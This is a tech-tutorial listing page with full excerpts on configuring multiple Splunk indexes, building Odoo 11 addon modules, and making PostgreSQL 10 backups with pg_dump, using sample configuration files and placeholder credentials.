How-To Tutorials

article-image-use-tensorflow-and-nlp-to-detect-duplicate-quora-questions-tutorial

21 Jun 2018

32 min read

Use TensorFlow and NLP to detect duplicate Quora questions [Tutorial]

21 Jun 2018

0
1
40330

article-image-create-a-travel-app-with-xamarin

Sugandha Lahoti

20 Jun 2018

14 min read

Create a travel app with Xamarin [Tutorial]

Sugandha Lahoti

20 Jun 2018

14 min read

0
1
47209

article-image-splunk-how-to-work-with-multiple-indexes-tutorial

Pravin Dhandre

20 Jun 2018

12 min read

Splunk: How to work with multiple indexes [Tutorial]

Pravin Dhandre

20 Jun 2018

12 min read

An index in Splunk is a storage pool for events, capped by size and time. By default, all events will go to the index specified by defaultDatabase, which is called main but lives in a directory called defaultdb. In this tutorial, we put focus to index structures, need of multiple indexes, how to size an index and how to manage multiple indexes in a Splunk environment. This article is an excerpt from a book written by James D. Miller titled Implementing Splunk 7 - Third Edition. Directory structure of an index Each index occupies a set of directories on the disk. By default, these directories live in $SPLUNK_DB, which, by default, is located in $SPLUNK_HOME/var/lib/splunk. Look at the following stanza for the main index: [main] homePath = $SPLUNK_DB/defaultdb/db coldPath = $SPLUNK_DB/defaultdb/colddb thawedPath = $SPLUNK_DB/defaultdb/thaweddb maxHotIdleSecs = 86400 maxHotBuckets = 10 maxDataSize = auto_high_volume If our Splunk installation lives at /opt/splunk, the index main is rooted at the path /opt/splunk/var/lib/splunk/defaultdb. To change your storage location, either modify the value of SPLUNK_DB in $SPLUNK_HOME/etc/splunk-launch.conf or set absolute paths in indexes.conf. splunk-launch.conf cannot be controlled from an app, which means it is easy to forget when adding indexers. For this reason, and for legibility, I would recommend using absolute paths in indexes.conf. The homePath directories contain index-level metadata, hot buckets, and warm buckets. coldPath contains cold buckets, which are simply warm buckets that have aged out. See the upcoming sections The lifecycle of a bucket and Sizing an index for details. When to create more indexes There are several reasons for creating additional indexes. If your needs do not meet one of these requirements, there is no need to create more indexes. In fact, multiple indexes may actually hurt performance if a single query needs to open multiple indexes. Testing data If you do not have a test environment, you can use test indexes for staging new data. This then allows you to easily recover from mistakes by dropping the test index. Since Splunk will run on a desktop, it is probably best to test new configurations locally, if possible. Differing longevity It may be the case that you need more history for some source types than others. The classic example here is security logs, as compared to web access logs. You may need to keep security logs for a year or more, but need the web access logs for only a couple of weeks. If these two source types are left in the same index, security events will be stored in the same buckets as web access logs and will age out together. To split these events up, you need to perform the following steps: Create a new index called security, for instance Define different settings for the security index Update inputs.conf to use the new index for security source types For one year, you might make an indexes.conf setting such as this: [security] homePath = $SPLUNK_DB/security/db coldPath = $SPLUNK_DB/security/colddb thawedPath = $SPLUNK_DB/security/thaweddb #one year in seconds frozenTimePeriodInSecs = 31536000 For extra protection, you should also set maxTotalDataSizeMB, and possibly coldToFrozenDir. If you have multiple indexes that should age together, or if you will split homePath and coldPath across devices, you should use volumes. See the upcoming section, Using volumes to manage multiple indexes, for more information. Then, in inputs.conf, you simply need to add an index to the appropriate stanza as follows: [monitor:///path/to/security/logs/logins.log] sourcetype=logins index=security Differing permissions If some data should only be seen by a specific set of users, the most effective way to limit access is to place this data in a different index, and then limit access to that index by using a role. The steps to accomplish this are essentially as follows: Define the new index. Configure inputs.conf or transforms.conf to send these events to the new index. Ensure that the user role does not have access to the new index. Create a new role that has access to the new index. Add specific users to this new role. If you are using LDAP authentication, you will need to map the role to an LDAP group and add users to that LDAP group. To route very specific events to this new index, assuming you created an index called sensitive, you can create a transform as follows: [contains_password] REGEX = (?i)password[=:] DEST_KEY = _MetaData:Index FORMAT = sensitive You would then wire this transform to a particular sourcetype or source index in props.conf. Using more indexes to increase performance Placing different source types in different indexes can help increase performance if those source types are not queried together. The disks will spend less time seeking when accessing the source type in question. If you have access to multiple storage devices, placing indexes on different devices can help increase the performance even more by taking advantage of different hardware for different queries. Likewise, placing homePath and coldPath on different devices can help performance. However, if you regularly run queries that use multiple source types, splitting those source types across indexes may actually hurt performance. For example, let's imagine you have two source types called web_access and web_error. We have the following line in web_access: 2012-10-19 12:53:20 code=500 session=abcdefg url=/path/to/app And we have the following line in web_error: 2012-10-19 12:53:20 session=abcdefg class=LoginClass If we want to combine these results, we could run a query like the following: (sourcetype=web_access code=500) OR sourcetype=web_error | transaction maxspan=2s session | top url class If web_access and web_error are stored in different indexes, this query will need to access twice as many buckets and will essentially take twice as long. The life cycle of a bucket An index is made up of buckets, which go through a specific life cycle. Each bucket contains events from a particular period of time. The stages of this lifecycle are hot, warm, cold, frozen, and thawed. The only practical difference between hot and other buckets is that a hot bucket is being written to, and has not necessarily been optimized. These stages live in different places on the disk and are controlled by different settings in indexes.conf: homePath contains as many hot buckets as the integer value of maxHotBuckets, and as many warm buckets as the integer value of maxWarmDBCount. When a hot bucket rolls, it becomes a warm bucket. When there are too many warm buckets, the oldest warm bucket becomes a cold bucket. Do not set maxHotBuckets too low. If your data is not parsing perfectly, dates that parse incorrectly will produce buckets with very large time spans. As more buckets are created, these buckets will overlap, which means all buckets will have to be queried every time, and performance will suffer dramatically. A value of five or more is safe. coldPath contains cold buckets, which are warm buckets that have rolled out of homePath once there are more warm buckets than the value of maxWarmDBCount. If coldPath is on the same device, only a move is required; otherwise, a copy is required. Once the values of frozenTimePeriodInSecs, maxTotalDataSizeMB, or maxVolumeDataSizeMB are reached, the oldest bucket will be frozen. By default, frozen means deleted. You can change this behavior by specifying either of the following: coldToFrozenDir: This lets you specify a location to move the buckets once they have aged out. The index files will be deleted, and only the compressed raw data will be kept. This essentially cuts the disk usage by half. This location is unmanaged, so it is up to you to watch your disk usage. coldToFrozenScript: This lets you specify a script to perform some action when the bucket is frozen. The script is handed the path to the bucket that is about to be frozen. thawedPath can contain buckets that have been restored. These buckets are not managed by Splunk and are not included in all time searches. To search these buckets, their time range must be included explicitly in your search. I have never actually used this directory. Search https://splunk.com for restore archived to learn the procedures. Sizing an index To estimate how much disk space is needed for an index, use the following formula: (gigabytes per day) * .5 * (days of retention desired) Likewise, to determine how many days you can store an index, the formula is essentially: (device size in gigabytes) / ( (gigabytes per day) * .5 ) The .5 represents a conservative compression ratio. The log data itself is usually compressed to 10 percent of its original size. The index files necessary to speed up search brings the size of a bucket closer to 50 percent of the original size, though it is usually smaller than this. If you plan to split your buckets across devices, the math gets more complicated unless you use volumes. Without using volumes, the math is as follows: homePath = (maxWarmDBCount + maxHotBuckets) * maxDataSize coldPath = maxTotalDataSizeMB - homePath For example, say we are given these settings: [myindex] homePath = /splunkdata_home/myindex/db coldPath = /splunkdata_cold/myindex/colddb thawedPath = /splunkdata_cold/myindex/thaweddb maxWarmDBCount = 50 maxHotBuckets = 6 maxDataSize = auto_high_volume #10GB on 64-bit systems maxTotalDataSizeMB = 2000000 Filling in the preceding formula, we get these values: homePath = (50 warm + 6 hot) * 10240 MB = 573440 MB coldPath = 2000000 MB - homePath = 1426560 MB If we use volumes, this gets simpler and we can simply set the volume sizes to our available space and let Splunk do the math. Using volumes to manage multiple indexes Volumes combine pools of storage across different indexes so that they age out together. Let's make up a scenario where we have five indexes and three storage devices. The indexes are as follows: Name Data per day Retention required Storage needed web 50 GB no requirement ? security 1 GB 2 years 730 GB * 50 percent app 10 GB no requirement ? chat 2 GB 2 years 1,460 GB * 50 percent web_summary 1 GB 1 years 365 GB * 50 percent Now let's say we have three storage devices to work with, mentioned in the following table: Name Size small_fast 500 GB big_fast 1,000 GB big_slow 5,000 GB We can create volumes based on the retention time needed. Security and chat share the same retention requirements, so we can place them in the same volumes. We want our hot buckets on our fast devices, so let's start there with the following configuration: [volume:two_year_home] #security and chat home storage path = /small_fast/two_year_home maxVolumeDataSizeMB = 300000 [volume:one_year_home] #web_summary home storage path = /small_fast/one_year_home maxVolumeDataSizeMB = 150000 For the rest of the space needed by these indexes, we will create companion volume definitions on big_slow, as follows: [volume:two_year_cold] #security and chat cold storage path = /big_slow/two_year_cold maxVolumeDataSizeMB = 850000 #([security]+[chat])*1024 - 300000 [volume:one_year_cold] #web_summary cold storage path = /big_slow/one_year_cold maxVolumeDataSizeMB = 230000 #[web_summary]*1024 - 150000 Now for our remaining indexes, whose timeframe is not important, we will use big_fast and the remainder of big_slow, like so: [volume:large_home] #web and app home storage path = /big_fast/large_home maxVolumeDataSizeMB = 900000 #leaving 10% for pad [volume:large_cold] #web and app cold storage path = /big_slow/large_cold maxVolumeDataSizeMB = 3700000 #(big_slow - two_year_cold - one_year_cold)*.9 Given that the sum of large_home and large_cold is 4,600,000 MB, and a combined daily volume of web and app is 60,000 MB approximately, we should retain approximately 153 days of web and app logs with 50 percent compression. In reality, the number of days retained will probably be larger. With our volumes defined, we now have to reference them in our index definitions: [web] homePath = volume:large_home/web coldPath = volume:large_cold/web thawedPath = /big_slow/thawed/web [security] homePath = volume:two_year_home/security coldPath = volume:two_year_cold/security thawedPath = /big_slow/thawed/security coldToFrozenDir = /big_slow/frozen/security [app] homePath = volume:large_home/app coldPath = volume:large_cold/app thawedPath = /big_slow/thawed/app [chat] homePath = volume:two_year_home/chat coldPath = volume:two_year_cold/chat thawedPath = /big_slow/thawed/chat coldToFrozenDir = /big_slow/frozen/chat [web_summary] homePath = volume:one_year_home/web_summary coldPath = volume:one_year_cold/web_summary thawedPath = /big_slow/thawed/web_summary thawedPath cannot be defined using a volume and must be specified for Splunk to start. For extra protection, we specified coldToFrozenDir for the indexes' security and chat. The buckets for these indexes will be copied to this directory before deletion, but it is up to us to make sure that the disk does not fill up. If we allow the disk to fill up, Splunk will stop indexing until space is made available. This is just one approach to using volumes. You could overlap in any way that makes sense to you, as long as you understand that the oldest bucket in a volume will be frozen first, no matter what index put the bucket in that volume. With this, we learned to operate multiple indexes and how we can get effective business intelligence out of the data without hurting system performance. If you found this tutorial useful, do check out the book Implementing Splunk 7 - Third Edition and start creating advanced Splunk dashboards. Splunk leverages AI in its monitoring tools Splunk’s Input Methods and Data Feeds Splunk Industrial Asset Intelligence (Splunk IAI) targets Industrial IoT marketplace

0
0
17592

article-image-delphi-memory-management-techniques-for-parallel-programming

Pavan Ramchandani

19 Jun 2018

31 min read

Delphi: memory management techniques for parallel programming

Pavan Ramchandani

19 Jun 2018

31 min read

0
0
27785

article-image-most-popular-programming-languages-in-2018

Fatema Patrawala

19 Jun 2018

11 min read

The 5 most popular programming languages in 2018

Fatema Patrawala

19 Jun 2018

11 min read

0
1
49976

article-image-step-by-step-guide-to-creating-odoo-addon-modules

Sugandha Lahoti

19 Jun 2018

15 min read

A step by step guide to creating Odoo Addon Modules

Sugandha Lahoti

19 Jun 2018

15 min read

Odoo uses a client/server architecture in which clients are web browsers accessing the Odoo server via RPC. Both the server and client extensions are packaged as modules which are optionally loaded in a database. Odoo modules can either add brand new business logic to an Odoo system or alter and extend existing business logic. Everything in Odoo starts and ends with modules. In this article, we will cover the basics of creating Odoo Addon Modules. Recipes that we will cover in this. Creating and installing a new addon module Completing the addon module manifest Organizing the addon module file structure Adding Models Our main goal here is to understand how an addon module is structured and the typical incremental workflow to add components to it. This post is an excerpt from the book Odoo 11 Development Cookbook - Second Edition by Alexandre Fayolle and Holger Brunn. With this book, you can create fast and efficient server-side applications using the latest features of Odoo v11. For this article, you should have Odoo installed. You are also expected to be comfortable in discovering and installing extra addon modules. Creating and installing a new addon module In this recipe, we will create a new module, make it available in our Odoo instance, and install it. Getting ready We will need an Odoo instance ready to use. For explanation purposes, we will assume Odoo is available at ~/odoo-dev/odoo, although any other location of your preference can be used. We will also need a location for our Odoo modules. For the purpose of this recipe, we will use a local-addons directory alongside the odoo directory, at ~/odoo-dev/local-addons. How to do it... The following steps will create and install a new addon module: Change the working directory in which we will work and create the addons directory where our custom module will be placed: $ cd ~/odoo-dev $ mkdir local-addons Choose a technical name for the new module and create a directory with that name for the module. For our example, we will use my_module: $ mkdir local-addons/my_module A module's technical name must be a valid Python identifier; it must begin with a letter, and only contain letters (preferably lowercase), numbers, and underscore characters. Make the Python module importable by adding an __init__.py file: $ touch local-addons/my_module/__init__.py Add a minimal module manifest for Odoo to detect it. Create a __manifest__.py file with this line: {'name': 'My module'} Start your Odoo instance including our module directory in the addons path: $ odoo/odoo-bin --addons-path=odoo/addon/,local-addons/ If the --save option is added to the Odoo command, the addons path will be saved in the configuration file. Next time you start the server, if no addons path option is provided, this will be used. Make the new module available in your Odoo instance; log in to Odoo using admin, enable the Developer Mode in the About box, and in the Apps top menu, select Update Apps List. Now, Odoo should know about our Odoo module. Select the Apps menu at the top and, in the search bar in the top-right, delete the default Apps filter and search for my_module. Click on its Install button, and the installation will be concluded. How it works... An Odoo module is a directory containing code files and other assets. The directory name used is the module's technical name. The name key in the module manifest is its title. The __manifest__.py file is the module manifest. It contains a Python dictionary with information about the module, the modules it depends on, and the data files that it will load. In the example, a minimal manifest file was used, but in real modules, we will want to add a few other important keys. These are discussed in the Completing the module manifest recipe, which we will see next. The module directory must be Python-importable, so it also needs to have an __init__.py file, even if it's empty. To load a module, the Odoo server will import it. This will cause the code in the __init__.py file to be executed, so it works as an entry point to run the module Python code. Due to this, it will usually contain import statements to load the module Python files and submodules. Known modules can be installed directly from the command line using the --init or -i option. This list is initially set when you create a new database, from the modules found on the addons path provided at that time. It can be updated in an existing database with the Update Module List menu. Completing the addon module manifest The manifest is an important piece for Odoo modules. It contains important information about the module and declares the data files that should be loaded. Getting ready We should have a module to work with, already containing a __manifest__.py manifest file. You may want to follow the previous recipe to provide such a module to work with. How to do it... We will add a manifest file and an icon to our addon module: To create a manifest file with the most relevant keys, edit the module __manifest__.py file to look like this: { 'name': "Title", 'summary': "Short subtitle phrase", 'description': """Long description""", 'author': "Your name", 'license': "AGPL-3", 'website': "http://www.example.com", 'category': 'Uncategorized', 'version': '11.0.1.0.0', 'depends': ['base'], 'data': ['views.xml'], 'demo': ['demo.xml'], } To add an icon for the module, choose a PNG image to use and copy it to static/description/icon.png. How it works... The remaining content is a regular Python dictionary, with keys and values. The example manifest we used contains the most relevant keys: name: This is the title for the module. summary: This is the subtitle with a one-line description. description: This is a long description written in plain text or the ReStructuredText (RST) format. It is usually surrounded by triple quotes, and is used in Python to delimit multiline texts. For an RST quickstart reference, visit http://docutils.sourceforge.net/docs/user/rst/quickstart.html. author: This is a string with the name of the authors. When there is more than one, it is common practice to use a comma to separate their names, but note that it still should be a string, not a Python list. license: This is the identifier for the license under which the module is made available. It is limited to a predefined list, and the most frequent option is AGPL-3. Other possibilities include LGPL-3, Other OSI approved license, and Other proprietary. website: This is a URL people should visit to know more about the module or the authors. category: This is used to organize modules in areas of interest. The list of the standard category names available can be seen at https://github.com/odoo/odoo/blob/11.0/odoo/addons/base/module/module_data.xml. However, it's also possible to define other new category names here. version: This is the modules' version numbers. It can be used by the Odoo app store to detect newer versions for installed modules. If the version number does not begin with the Odoo target version (for example, 11.0), it will be automatically added. Nevertheless, it will be more informative if you explicitly state the Odoo target version, for example, using 11.0.1.0.0 or 11.0.1.0 instead of 1.0.0 or 1.0. depends: This is a list with the technical names of the modules it directly depends on. If none, we should at least depend on the base module. Don't forget to include any module defining XML IDs, Views, or Models referenced by this module. That will ensure that they all load in the correct order, avoiding hard-to-debug errors. data: This is a list of relative paths to the data files to load with module installation or upgrade. The paths are relative to the module root directory. Usually, these are XML and CSV files, but it's also possible to have YAML data files. demo: This is the list of relative paths to the files with demonstration data to load. These will only be loaded if the database was created with the Demo Data flag enabled. The image that is used as the module icon is the PNG file at static/description/icon.png. Odoo is expected to have significant changes between major versions, so modules built for one major version are likely to not be compatible with the next version without conversion and migration work. Due to this, it's important to be sure about a module's Odoo target version before installing it. There's more… Instead of having the long description in the module manifest, it's possible to have it in its own file. Since version 8.0, it can be replaced by a README file, with either a .txt, .rst, or an .md (Markdown) extension. Otherwise, include a description/index.html file in the module. This HTML description will override a description defined in the manifest file. There are a few more keys that are frequently used: application: If this is True, the module is listed as an application. Usually, this is used for the central module of a functional area auto_install: If this is True, it indicates that this is a "glue" module, which is automatically installed when all of its dependencies are installed installable: If this is True (the default value), it indicates that the module is available for installation Organizing the addon module file structure An addon module contains code files and other assets such as XML files and images. For most of these files, we are free to choose where to place them inside the module directory. However, Odoo uses some conventions on the module structure, so it is advisable to follow them. Getting ready We are expected to have an addon module directory with only the __init__.py and __manifest__.py files. In this recipe, we suppose this is local-addons/my_module. How to do it... To create the basic skeleton for the addon module, perform the given steps: Create the directories for code files: $ cd local-addons/my_module $ mkdir models $ touch models/__init__.py $ mkdir controllers $ touch controllers/__init__.py $ mkdir views $ mkdir security $ mkdir data $ mkdir demo $ mkdir i18n $ mkdir -p static/description Edit the module's top __init__.py file so that the code in subdirectories is loaded: from . import models from . import controllers This should get us started with a structure containing the most used directories, similar to this one: . ├── __init__.py ├── __manifest__.py │ ├── controllers │ └── __init__.py ├── data ├── demo ├── i18n ├── models │ └── __init__.py ├── security ├── static │ └── description └── views How it works... To provide some context, an Odoo addon module can have three types of files: The Python code is loaded by the __init__.py files, where the .py files and code subdirectories are imported. Subdirectories containing code Python, in turn, need their own __init__.py. Data files that are to be declared in the data and demo keys of the __manifest__.py module manifest in order to be loaded are usually XML and CSV files for the user interface, fixture data, and demonstration data. There can also be YAML files, which can include some procedural instructions that are run when the module is loaded, for instance, to generate or update records programmatically rather than statically in an XML file. Web assets such as JavaScript code and libraries, CSS, and QWeb/HTML templates also play an important part. There are declared through an XML file extending the master templates to add these assets to the web client or website pages. The addon files are to be organized in these directories: models/ contains the backend code files, creating the Models and their business logic. A file per Model is recommended, with the same name as the model, for example, library_book.py for the library.book model. views/ contains the XML files for the user interface, with the actions, forms, lists, and so on. As with models, it is advised to have one file per model. Filenames for website templates are expected to end with the _template suffix. data/ contains other data files with module initial data. demo/ contains data files with demonstration data, useful for tests, training, or module evaluation. i18n/ is where Odoo will look for the translation .pot and .po files. These files don't need to be mentioned in the manifest file. security/ contains the data files defining access control lists, usually a ir.model.access.csv file, and possibly an XML file to define access Groups and Record Rules for row level security. controllers/ contains the code files for the website controllers, and for modules providing that kind of feature. static/ is where all web assets are expected to be placed. Unlike other directories, this directory name is not just a convention, and only files inside it can be made available for the Odoo web pages. They don't need to be mentioned in the module manifest, but will have to be referred to in the web template. When adding new files to a module, don't forget to declare them either in the __manifest__.py (for data files) or __init__.py (for code files); otherwise, those files will be ignored and won't be loaded. Adding models Models define the data structures to be used by our business applications. This recipe shows how to add a basic model to a module. We will use a simple book library example to explain this; we want a model to represent books. Each book has a name and a list of authors. Getting ready We should have a module to work with. We will use an empty my_module for our explanation. How to do it... To add a new Model, we add a Python file describing it and then upgrade the addon module (or install it, if it was not already done). The paths used are relative to our addon module location (for example, ~/odoo-dev/local-addons/my_module/): Add a Python file to the models/library_book.py module with the following code: from odoo import models, fields class LibraryBook(models.Model): _name = 'library.book' name = fields.Char('Title', required=True) date_release = fields.Date('Release Date') author_ids = fields.Many2many( 'res.partner', string='Authors' ) Add a Python initialization file with code files to be loaded by the models/__init__.py module with the following code: from . import library_book Edit the module Python initialization file to have the models/ directory loaded by the module: from . import models Upgrade the Odoo module, either from the command line or from the apps menu in the user interface. If you look closely at the server log while upgrading the module, you should see this line: odoo.modules.registry: module my_module: creating or updating database table After this, the new library.book model should be available in our Odoo instance. If we have the technical tools activated, we can confirm that by looking it up at Settings | Technical | Database Structure | Models. How it works... Our first step was to create a Python file where our new module was created. Odoo models are objects derived from the Odoo Model Python class. When a new model is defined, it is also added to a central model registry. This makes it easier for other modules to make modifications to it later. Models have a few generic attributes prefixed with an underscore. The most important one is _name, providing a unique internal identifier to be used throughout the Odoo instance. The model fields are defined as class attributes. We began defining the name field of the Char type. It is convenient for models to have this field, because by default, it is used as the record description when referenced from other models. We also used an example of a relational field, author_ids. It defines a many-to-many relation between Library Books and the partners. A book can have many authors and each author can have written many books. Next, we must make our module aware of this new Python file. This is done by the __init__.py files. Since we placed the code inside the models/ subdirectory, we need the previous __init__ file to import that directory, which should, in turn, contain another __init__ file importing each of the code files there (just one, in our case). Changes to Odoo models are activated by upgrading the module. The Odoo server will handle the translation of the model class into database structure changes. Although no example is provided here, business logic can also be added to these Python files, either by adding new methods to the Model's class or by extending the existing methods, such as create() or write(). Thus we learned about the structure of an Odoo addon module and learned, step-by-step, how to create a simple module from scratch. To know more about, how to define access rules for your data; how to expose your data models to end users on the back end and on the front end; and how to create beautiful PDF versions of your data, read this book Odoo 11 Development Cookbook - Second Edition. ERP tool in focus: Odoo 11 Building Your First Odoo Application How to Scaffold a New module in Odoo 11

0
0
49047

article-image-grunt-makes-it-easy-to-test-and-optimize-your-website-heres-how-tutorial

Sugandha Lahoti

18 Jun 2018

17 min read

Grunt makes it easy to test and optimize your website. Here's how. [Tutorial]

Sugandha Lahoti

18 Jun 2018

17 min read

0
0
16014

article-image-handling-backup-and-recovery-in-postgresql-10

Savia Lobo

18 Jun 2018

11 min read

Handling backup and recovery in PostgreSQL 10 [Tutorial]

Savia Lobo

18 Jun 2018

11 min read

Performing backups should be a regular task and every administrator is supposed to keep an eye on this vital stuff. Fortunately, PostgreSQL provides an easy means to create backups. In this tutorial, you will learn how to backup data by performing some simple dumps and also recover them using PostgreSQL 10. This article is an excerpt taken from, 'Mastering PostgreSQL 10' written by Hans-Jürgen Schönig. This book highlights the newly introduced features in PostgreSQL 10, and shows you how to build better PostgreSQL applications. Performing simple dumps If you are running a PostgreSQL setup, there are two major methods to perform backups: Logical dumps (extract an SQL script representing your data) Transaction log shipping The idea behind transaction log shipping is to archive binary changes made to the database. Most people claim that transaction log shipping is the only real way to do backups. However, in my opinion, this is not necessarily true. Many people rely on pg_dump to simply extract a textual representation of the data. pg_dump is also the oldest method of creating a backup and has been around since the very early days of the project (transaction log shipping was added much later). Every PostgreSQL administrator will become familiar with pg_dump sooner or later, so it is important to know how it really works and what it does. Running pg_dump The first thing we want to do is to create a simple textual dump: [hs@linuxpc ~]$ pg_dump test > /tmp/dump.sql This is the most simplistic backup you can imagine. pg_dump logs into the local database instance connects to a database test and starts to extract all the data, which will be sent to stdout and redirected to the file. The beauty is that standard output gives you all the flexibility of a Unix system. You can easily compress the data using a pipe or do whatever you want. In some cases, you might want to run pg_dump as a different user. All PostgreSQL client programs support a consistent set of command-line parameters to pass user information. If you just want to set the user, use the -U flag: [hs@linuxpc ~]$ pg_dump -U whatever_powerful_user test > /tmp/dump.sql The following set of parameters can be found in all PostgreSQL client programs: ... Connection options: -d, --dbname=DBNAME database to dump -h, --host=HOSTNAME database server host or socket directory -p, --port=PORT database server port number -U, --username=NAME connect as specified database user -w, --no-password never prompt for password -W, --password force password prompt (should happen automatically) --role=ROLENAME do SET ROLE before dump ... Just pass the information you want to pg_dump, and if you have enough permissions, PostgreSQL will fetch the data. The important thing here is to see how the program really works. Basically, pg_dump connects to the database and opens a large repeatable read transaction that simply reads all the data. Remember, repeatable read ensures that PostgreSQL creates a consistent snapshot of the data, which does not change throughout the transactions. In other words, a dump is always consistent—no foreign keys will be violated. The output is a snapshot of data as it was when the dump started. Consistency is a key factor here. It also implies that changes made to the data while the dump is running won't make it to the backup anymore. A dump simply reads everything—therefore, there are no separate permissions to be able to dump something. As long as you can read it, you can back it up. Also, note that the backup is by default in a textual format. This means that you can safely extract data from say, Solaris, and move it to some other CPU architecture. In the case of binary copies, that is clearly not possible as the on-disk format depends on your CPU architecture. Passing passwords and connection information If you take a close look at the connection parameters shown in the previous section, you will notice that there is no way to pass a password to pg_dump. You can enforce a password prompt, but you cannot pass the parameter to pg_dump using a command-line option. The reason for that is simple: the password might show up in the process table and be visible to other people. Therefore, this is not supported. The question now is: if pg_hba.conf on the server enforces a password, how can the client program provide it? There are various means of doing that: Making use of environment variables Making use of .pgpass Using service files In this section, you will learn about all three methods. Using environment variables One way to pass all kinds of parameters is to use environment variables. If the information is not explicitly passed to pg_dump, it will look for the missing information in predefined environment variables. A list of all potential settings can be found here: https://www.postgresql.org/docs/10/static/libpq-envars.html. The following overview shows some environment variables commonly needed for backups: PGHOST: It tells the system which host to connect to PGPORT: It defines the TCP port to be used PGUSER: It tells a client program about the desired user PGPASSWORD: It contains the password to be used PGDATABASE: It is the name of the database to connect to The advantage of these environments is that the password won't show up in the process table. However, there is more. Consider the following example: psql -U ... -h ... -p ... -d ... Suppose you are a system administrator: do you really want to type a long line like that a couple of times every day? If you are working with the very same host again and again, just set those environment variables and connect with plain SQL: [hs@linuxpc ~]$ export PGHOST=localhost [hs@linuxpc ~]$ export PGUSER=hs [hs@linuxpc ~]$ export PGPASSWORD=abc [hs@linuxpc ~]$ export PGPORT=5432 [hs@linuxpc ~]$ export PGDATABASE=test [hs@linuxpc ~]$ psql psql (10.1) Type "help" for help. As you can see, there are no command-line parameters anymore. Just type psql and you are in. All applications based on the standard PostgreSQLC-language client library (libpq) will understand these environment variables, so you cannot only use them for psql and pg_dump, but for many other applications. Making use of .pgpass A very common way to store login information is via the use of .pgpass files. The idea is simple: put a file called .pgpass into your home directory and put your login information there. The format is simple: hostname:port:database:username:password An example would be: 192.168.0.45:5432:mydb:xy:abc PostgreSQL offers some nice additional functionality: most fields can contain *. Here is an example: *:*:*:xy:abc This means that on every host, on every port, for every database, the user called xy will use abc as the password. To make PostgreSQL use the .pgpass file, make sure that the right file permissions are in place: chmod 0600 ~/.pgpass .pgpass can also be used on a Windows system. In this case, the file can be found in the %APPDATA%postgresqlpgpass.conf path. Using service files However, there is not just the .pgpass file. You can also make use of service files. Here is how it works. If you want to connect to the very same servers over and over again, you can create a .pg_service.conf file. It will hold all the connection information you need. Here is an example of a .pg_service.conf file: Mac:~ hs$ cat .pg_service.conf # a sample service [hansservice] host=localhost port=5432 dbname=test user=hs password=abc [paulservice] host=192.168.0.45 port=5432 dbname=xyz user=paul password=cde To connect to one of the services, just set the environment and connect: iMac:~ hs$ export PGSERVICE=hansservice A connection can now be established without passing parameters to psql: iMac:~ hs$ psql psql (10.1) Type "help" for help. test=# Alternatively, you can use: psql service=hansservice Extracting subsets of data Up to now, you have seen how to dump an entire database. However, this is not what you might wish for. In many cases, you might just want to extract a subset of tables or schemas. pg_dump can do that and provides a number of switches: -a: It dumps only the data and does not dump the data structure -s: It dumps only the data structure but skips the data -n: It dumps only a certain schema -N: It dumps everything but excludes certain schemas -t: It dumps only certain tables -T: It dumps everything but certain tables (this can make sense if you want to exclude logging tables and so on) Partial dumps can be very useful to speed things up considerably. Handling various formats So far, you have seen that pg_dump can be used to create text files. The problem is that a text file can only be replayed completely. If you have saved an entire database, you can only replay the entire thing. In many cases, this is not what you want. Therefore, PostgreSQL has additional formats that also offer more functionality. At this point, four formats are supported: -F, --format=c|d|t|p output file format (custom, directory, tar, plain text (default)) You have already seen plain, which is just normal text. On top of that, you can use a custom format. The idea behind a custom format is to have a compressed dump, including a table of contents. Here are two ways to create a custom format dump: [hs@linuxpc ~]$ pg_dump -Fc test > /tmp/dump.fc [hs@linuxpc ~]$ pg_dump -Fc test -f /tmp/dump.fc In addition to the table of contents, the compressed dump has one more advantage: it is a lot smaller. The rule of thumb is that a custom format dump is around 90% smaller than the database instance you are about to back up. Of course, this highly depends on the number of indexes and all that, but for many database applications, this rough estimation will hold true. Once you have created the backup, you can inspect the backup file: [hs@linuxpc ~]$ pg_restore --list /tmp/dump.fc ; ; Archive created at 2017-11-04 15:44:56 CET ; dbname: test ; TOC Entries: 18 ; Compression: -1 ; Dump Version: 1.12-0 ; Format: CUSTOM ; Integer: 4 bytes ; Offset: 8 bytes ; Dumped from database version: 10.1 ; Dumped by pg_dump version: 10.1 ; ; Selected TOC Entries: ; 3103; 1262 16384 DATABASE - test hs 3; 2615 2200 SCHEMA - public hs 3104; 0 0 COMMENT - SCHEMA public hs 1; 3079 13350 EXTENSION - plpgsql 3105; 0 0 COMMENT - EXTENSION plpgsql 187; 1259 16391 TABLE public t_test hs ... pg_restore --list will return the table of contents of the backup. Using a custom format is a good idea as the backup will shrink in size. However, there is more; the -Fd command will create a backup in a directory format. Instead of a single file, you will now get a directory containing a couple of files: [hs@linuxpc ~]$ mkdir /tmp/backup [hs@linuxpc ~]$ pg_dump -Fd test -f /tmp/backup/ [hs@linuxpc ~]$ cd /tmp/backup/ [hs@linuxpc backup]$ ls -lh total 86M -rw-rw-r--. 1 hs hs 85M Jan 4 15:54 3095.dat.gz -rw-rw-r--. 1 hs hs 107 Jan 4 15:54 3096.dat.gz -rw-rw-r--. 1 hs hs 740K Jan 4 15:54 3097.dat.gz -rw-rw-r--. 1 hs hs 39 Jan 4 15:54 3098.dat.gz -rw-rw-r--. 1 hs hs 4.3K Jan 4 15:54 toc.dat One advantage of the directory format is that you can use more than one core to perform the backup. In the case of a plain or custom format, only one process will be used by pg_dump. The directory format changes that rule. The following example shows how you can tell pg_dump to use four cores (jobs): [hs@linuxpc backup]$ rm -rf * [hs@linuxpc backup]$ pg_dump -Fd test -f /tmp/backup/ -j 4 Note that the more objects you have in your database, the more potential speedup there will be. To summarize, you learned about creating backups in general. If you've enjoyed reading this post, do check out 'Mastering PostgreSQL 10' to know how to replay backup and handle global data in PostgreSQL10. You will learn how to use PostgreSQL onboard tools to replicate instances. PostgreSQL 11 Beta 1 is out! How to perform data partitioning in PostgreSQL 10 How to implement Dynamic SQL in PostgreSQL 10

0
0
31136

article-image-working-with-shaders-in-c-to-create-3d-games

Amarabha Banerjee

15 Jun 2018

28 min read

Working with shaders in C++ to create 3D games

Amarabha Banerjee

15 Jun 2018

28 min read

0
0
47216

article-image-implementing-an-api-design-first-approach-for-building-apis

Packt Editorial Staff

15 Jun 2018

9 min read

Implement an API Design-first approach for building APIs [Tutorial]

Packt Editorial Staff

15 Jun 2018

9 min read

0
0
40577

article-image-protect-tcp-tunnel-implementing-aes-encryption-with-python

Savia Lobo

15 Jun 2018

7 min read

